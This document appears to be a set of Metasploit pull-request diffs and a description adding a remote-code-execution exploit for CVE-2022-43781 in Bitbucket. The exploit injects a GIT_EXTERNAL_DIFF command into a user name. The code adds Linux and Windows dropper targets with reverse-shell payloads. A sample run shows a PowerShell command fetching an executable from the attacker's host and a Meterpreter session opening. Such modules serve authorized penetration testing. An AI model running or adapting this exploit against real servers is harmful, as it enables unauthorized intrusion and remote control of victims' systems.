+    path = json['values']&.first&.dig('path')
+    return nil unless path
+
+    [ latest_commit, prev_commit, path['name'] ]
+  end
+
   def exploit
+    @use_public_repo = true
     datastore['GIT_USERNAME'] = datastore['USERNAME']
     datastore['GIT_PASSWORD'] = datastore['PASSWORD']
 
@@ -486,10 +568,16 @@ class MetasploitModule < Msf::Exploit::Remote
     log_in(datastore['USERNAME'], datastore['PASSWORD'])
     @curr_uname = datastore['USERNAME']
 
-    @project_name, @project_key = create_project
-    email, @repo_name = create_repository
-    @latest_commit, @first_commit, @diff_file = create_commits(email)
-    print_good("Commits added: #{@first_commit}, #{@latest_commit}")
+    @project_name, @project_key = get_repo
+    @repo_name = @project_name
+    @latest_commit, @first_commit, @diff_file = get_repo_info
+    unless @latest_commit && @first_commit && @diff_file
+      @use_public_repo = false
+      @project_name, @project_key = create_project
+      email, @repo_name = create_repository
+      @latest_commit, @first_commit, @diff_file = create_commits(email)
+      print_good("Commits added: #{@first_commit}, #{@latest_commit}")
+    end
 
     print_status('Sending payload')
     case target['Type']
@@ -519,8 +607,10 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    delete_repository(@curr_uname) if @repo_name
-    delete_project(@curr_uname) if @project_name
+    unless @use_public_repo
+      delete_repository(@curr_uname) if @repo_name
+      delete_project(@curr_uname) if @project_name
+    end
   end
 
   def execute_command(cmd, _opts = {})

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -90,8 +90,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(7990),
-        OptString.new('USERNAME', [ false, 'User name to log in with' ]),
-        OptString.new('PASSWORD', [ false, 'Password to log in with' ]),
+        OptString.new('USERNAME', [ true, 'User name to log in with' ]),
+        OptString.new('PASSWORD', [ true, 'Password to log in with' ]),
         OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/'])
       ]
     )

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2022-43781']
         ],
         'Platform' => [ 'win', 'unix', 'linux' ],
-        'Privileged' => false,
+        'Privileged' => true,
         'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
         'Targets' => [
           [
@@ -285,9 +285,7 @@ class MetasploitModule < Msf::Exploit::Remote
     [ email, repo_name ]
   end
 
-  # create two files in two separate commits in order
-  # to view a diff and get code execution
-  def create_commits(email)
+  def generate_repo_objects(email, repo_file_data = [], parent_object = nil)
     txt_data = Rex::Text.rand_text_alpha(5..20)
     blob_object = GitObject.build_blob_object(txt_data)
     file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
@@ -298,40 +296,42 @@ class MetasploitModule < Msf::Exploit::Remote
       sha1: blob_object.sha1
     }
 
-    tree_obj = GitObject.build_tree_object(file_data)
-    commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: email })
+    tree_data = (repo_file_data.empty? ? [ file_data ] : [ file_data, repo_file_data ])
+    tree_obj = GitObject.build_tree_object(tree_data)
+    commit_obj = GitObject.build_commit_object({
+      tree_sha1: tree_obj.sha1,
+      email: email,
+      message: Rex::Text.rand_text_alpha(4..30),
+      parent_sha1: (parent_object.nil? ? nil : parent_object.sha1)
+    })
+
+    {
+      objects: [ commit_obj, tree_obj, blob_object ],
+      file_data: file_data
+    }
+  end
+
+  # create two files in two separate commits in order
+  # to view a diff and get code execution
+  def create_commits(email)
+    init_objects = generate_repo_objects(email)
+    commit_obj = init_objects[:objects].first
 
     refs = {
       'HEAD' => "refs/heads/#{default_branch}",
       "refs/heads/#{default_branch}" => commit_obj.sha1
     }
 
-    new_file_data = Rex::Text.rand_text_alpha(5..20)
-    new_blob_object = GitObject.build_blob_object(new_file_data)
-    new_file = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
-
-    new_file_data = {
-      mode: '100755',
-      file_name: new_file,
-      sha1: new_blob_object.sha1
-    }
-
-    tree_data = [ new_file_data, file_data ]
-    new_tree = GitObject.build_tree_object(tree_data)
-    new_commit = GitObject.build_commit_object(
-      {
-        tree_sha1: new_tree.sha1,
-        email: email,
-        parent_sha1: commit_obj.sha1,
-        message: Rex::Text.rand_text_alpha(4..30)
-      }
-    )
+    final_objects = generate_repo_objects(email, init_objects[:file_data], commit_obj)
+    repo_objects = final_objects[:objects] + init_objects[:objects]
+    new_commit = final_objects[:objects].first
+    new_file = final_objects[:file_data][:file_name]
 
     git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git")
     res = send_receive_pack_request(
       git_uri,
       refs['HEAD'],
-      [ new_commit, new_tree, new_blob_object, commit_obj, tree_obj, blob_object ],
+      repo_objects,
       '0' * 40 # no commits should exist yet, so no branch tip in repo yet
     )
 
@@ -349,13 +349,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'name' => curr_uname }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Failed to access user page') unless res
-    scripts = res.get_html_document&.search('script')
-    fail_with(Failure::UnexpectedReply, 'Couldn\'t obtain list of scripts') unless scripts
-    scripts = scripts.select { |script| script&.children&.text&.include?("name\":\"#{curr_uname}\"") }
-    fail_with(Failure::UnexpectedReply, 'Failed to get scripts that match user name') unless scripts
-
-    matched_id = scripts&.first&.children&.text&.match(/"id":(\d+)/)
+    matched_id = res.get_html_document&.xpath("//script[contains(text(), '\"name\":\"#{curr_uname}\"')]")&.first&.text&.match(/"id":(\d+)/)
     fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1
 
     matched_id[1]
@@ -586,12 +580,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :linux_dropper
       execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)
     when :unix_cmd
-      unless change_username(datastore['USERNAME'], uname_payload(payload.encoded.strip))
-        fail_with(Failure::UnexpectedReply, 'User name change failed. The user may not have the correct permissions')
-      end
-
-      @curr_uname = uname_payload(payload.encoded.strip)
-      view_commit_diff(@latest_commit, @first_commit, @diff_file)
+      execute_command(payload.encoded.strip)
     end
   end
 

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -18,6 +18,13 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Bitbucket Environment Variable RCE',
         'Description' => %q{
+          For various versions of Bitbucket, there is a command injection
+          vulnerability that can be exploited by injecting environment
+          variables into a user name. This module achieves remote code execution
+          as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment
+          variable, a null character as a delimiter, and arbitrary code into a user's
+          user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
+          will be run once the Bitbucket application is coerced into generating a diff.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -30,33 +37,48 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],
           [ 'CVE', '2022-43781']
         ],
-        'Platform' => [ 'win', 'unix' ],
+        'Platform' => [ 'win', 'unix', 'linux' ],
         'Privileged' => false,
         'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
         'Targets' => [
           [
-            'Linux',
+            'Linux Command',
             {
               'Platform' => 'unix',
+              'Type' => :unix_cmd,
               'Payload' => { 'Space' => 254 },
               'Arch' => [ ARCH_CMD ]
             }
           ],
           [
-            'Windows',
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'MaxLineChars' => 254,
+              'Type' => :linux_dropper,
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' => %i[wget curl],
+              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Dropper',
             {
               'Platform' => 'win',
+              'MaxLineChars' => 254,
               'Type' => :win_dropper,
-              'Arch' => [ ARCH_X86, ARCH_X64 ]
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' => [ :psh_invokewebrequest ],
+              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
             }
           ]
         ],
         'DisclosureDate' => '2022-11-16',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => []
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
         }
       )
     )
@@ -136,8 +158,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @default_branch ||= Rex::Text.rand_text_alpha(5..9)
   end
 
-  def uname_payload
-    @uname_payload ||= "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded.strip})"
+  def uname_payload(cmd)
+    "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})"
   end
 
   def log_in(username, password)
@@ -164,11 +186,11 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'dashboard'),
+      'uri' => normalize_uri(target_uri.path, 'projects'),
       'keep_cookies' => true
     )
 
-    fail_with(Failure::UnexpectedReply, 'No response from the dashboard') unless res
+    fail_with(Failure::UnexpectedReply, 'No response from the projects page') unless res
     unless res.body.include?('Logged in')
       fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials')
     end
@@ -271,8 +293,8 @@ class MetasploitModule < Msf::Exploit::Remote
       file_name: file_name,
       sha1: blob_object.sha1
     }
-    tree_obj = GitObject.build_tree_object(file_data)
 
+    tree_obj = GitObject.build_tree_object(file_data)
     commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: email })
 
     refs = {
@@ -368,7 +390,6 @@ class MetasploitModule < Msf::Exploit::Remote
       return false
     end
 
-    vprint_good('User name was successfully changed')
     true
   end
 
@@ -459,6 +480,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     log_in(datastore['USERNAME'], datastore['PASSWORD'])
+    @curr_uname = datastore['USERNAME']
 
     @project_name, @project_key = create_project
     email, @repo_name = create_repository
@@ -466,42 +488,49 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Commits added: #{@first_commit}, #{@latest_commit}")
 
     print_status('Sending payload')
-    if target['Type'] == :win_dropper
-      execute_cmdstager(linemax: 254 - "#{datastore['USERNAME']}\u0000EXTERNAL_GIT_DIFF=$(cmd.exe /c )".length, flavor: :psh_invokewebrequest, noconcat: true, nodelete: true, temp: '.')
-    else
-      @changed = change_username(datastore['USERNAME'], uname_payload)
-      fail_with(Failure::UnexpectedReply, 'User name change failed. The user may not have the correct permissions') unless @changed
+    case target['Type']
+    when :win_dropper
+      execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.')
+    when :linux_dropper
+      execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)
+    when :unix_cmd
+      unless change_username(datastore['USERNAME'], uname_payload(payload.encoded.strip))
+        fail_with(Failure::UnexpectedReply, 'User name change failed. The user may not have the correct permissions')
+      end
 
+      @curr_uname = uname_payload(payload.encoded.strip)
       view_commit_diff(@latest_commit, @first_commit, @diff_file)
     end
   end
 
   def cleanup
-    curr_uname = datastore['USERNAME']
-    if @changed
-      curr_uname = uname_payload
+    if @curr_uname != datastore['USERNAME']
       print_status("Changing user name back to '#{datastore['USERNAME']}'")
-      curr_uname = datastore['USERNAME'] if change_username(uname_payload, datastore['USERNAME'])
+
+      if change_username(@curr_uname, datastore['USERNAME'])
+        @curr_uname = datastore['USERNAME']
+      else
+        print_warning('User name is still set to payload.' \
+                      "Please manually change the user name back to #{datastore['USERNAME']}")
+      end
     end
 
-    if curr_uname == uname_payload
-      print_warning('User name is still set to payload.' \
-                    "Please manually change the user name back to #{datastore['USERNAME']}")
-    end
-
-    delete_repository(curr_uname) if @repo_name
-    delete_project(curr_uname) if @project_name
+    delete_repository(@curr_uname) if @repo_name
+    delete_project(@curr_uname) if @project_name
   end
 
   def execute_command(cmd, _opts = {})
-    unless @changed
-      @curr_cmd_uname = datastore['USERNAME']
+    if target['Platform'] == 'win'
+      curr_payload = (cmd.ends_with?('.exe') ? uname_payload("cmd.exe /c #{cmd}") : uname_payload(cmd))
+    else
+      curr_payload = uname_payload(cmd)
     end
 
-    # require 'pry';binding.pry
-    curr_payload = (cmd.ends_with?('.exe') ? "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(cmd.exe /c #{cmd})" : "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})")
-    @changed = change_username(@curr_cmd_uname, curr_payload)
+    unless change_username(@curr_uname, curr_payload)
+      fail_with(Failure::UnexpectedReply, 'Failed to change user name to payload')
+    end
+
     view_commit_diff(@latest_commit, @first_commit, @diff_file)
-    @curr_cmd_uname = curr_payload
+    @curr_uname = curr_payload
   end
 end

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -289,8 +289,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # create a packfile for repo and push to default branch
     refs = {
-      'HEAD' => "refs/head/#{default_branch}",
-      "refs/head/#{default_branch}" => commit_obj.sha1
+      'HEAD' => "refs/heads/#{default_branch}",
+      "refs/heads/#{default_branch}" => commit_obj.sha1
     }
 
     git_uri = normalize_uri(target_uri.path, "scm/~#{username}/#{repo_name}.git")


### PR DESCRIPTION
## Description

This adds an exploit for CVE-2022-43781.

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
will be run once the Bitbucket application is coerced into generating a diff.

This module requires at least admin credentials, as admins and above
only have the option to change their user name.

## Verification

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/multi/http/bitbucket_env_var_rce`
- [ ] Do: `set USERNAME <username>`
- [ ] Do: `set PASSWORD <pass>`
- [ ] Do: `run`
- [ ] You should get a shell.

## Scenarios

```
msf6 > use exploit/multi/http/bitbucket_env_var_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
rhost => 192.168.140.171
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
username => admin
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
password => P@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
target => 2
msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version 7.18.1 of Bitbucket
[+] The target appears to be vulnerable.
[*] Retrieving security token
[*] Project creation was successful
[+] Successfully created repository 'GqFji'
[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
[*] Command Stager progress -  75.19% done (97/129 bytes)
[*] Sending stage (175686 bytes) to 192.168.140.171
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
[*] Command Stager progress -  86.05% done (111/129 bytes)
[*] Command Stager progress - 100.00% done (129/129 bytes)
[*] Changing user name back to 'admin'
[*] Attempting to delete repository 'GqFji'
[+] Repository has been deleted
[*] Now attempting to delete project 'eTzDRa'
[+] Project has been deleted

meterpreter > getuid
Server username: DESKTOP-5JSUGC8\atlbitbucket
meterpreter > sysinfo
Computer        : DESKTOP-5JSUGC8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
```